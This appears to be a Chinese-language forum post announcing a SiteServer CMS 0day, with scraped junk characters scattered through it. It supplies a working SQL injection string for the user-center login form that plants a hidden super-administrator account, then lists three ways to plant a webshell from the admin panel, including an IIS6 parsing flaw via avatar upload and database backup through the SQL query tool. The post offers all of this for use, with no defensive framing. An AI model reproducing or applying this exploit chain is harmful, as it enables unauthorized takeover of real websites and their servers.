SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
$ I8 |  e& R3 A# `! _7 \5 r) P
stieserver官网:www.siteserver.cn
, Z0 v5 k3 _7 C" _& W

3 J$ I; t1 K* I
8 N9 l. Q! F6 i$ }+ d% j; O: O7 JEXP:
# n& L' `) s: _  Q& }/ ^* p
% X8 V7 y+ r5 R/ y, c/ p直接访问UserCenter/login.aspx
7 u" f' B/ u2 @# v" E' s
# ~5 j( Q/ s& D! r( m

4 z, b2 Y/ I8 j6 K$ P6 ?) J4 b3 V用户名处输入：

! ?% N9 ]0 j# Q1 s123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
; F1 ]$ g1 y- u$ U! w4 ]; Z( u7 {+ g& p


9 Y) D. L3 W  U  \1 ^: f密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


, `- ]4 P3 R" b+ ]) ?0 w# W
2 E' @+ U! J* Z% S4 j% l之后再访问后台SiteServer/login.aspx用插入的用户登陆



+ m+ a) H& l) p8 L0 K后台拿webshell的三种方法：

% [- f- |7 j! H! L) Y一、
; u. G1 G9 V3 A$ M
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
" t" C; U- g# I  ~) P; g2 K  K5 v
二、
7 f& N. n+ `% Q+ E: ~7 K& \
* `: G3 d, [) j0 z9 h成员权限-》添加用户-》用户名为：1.asp
, e( A# F  r, z1 D  V
http://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
" A6 g) k/ V4 C8 X% H3 h
（ps：后台添加用户时不会验证是否含有非法字符）

三、
+ e2 w- w4 \# e1 n6 C
2 p: d. R1 ^, q# [系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
9 K' ~. O. [( A
: C7 X4 ^- j' P+ D2 D系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。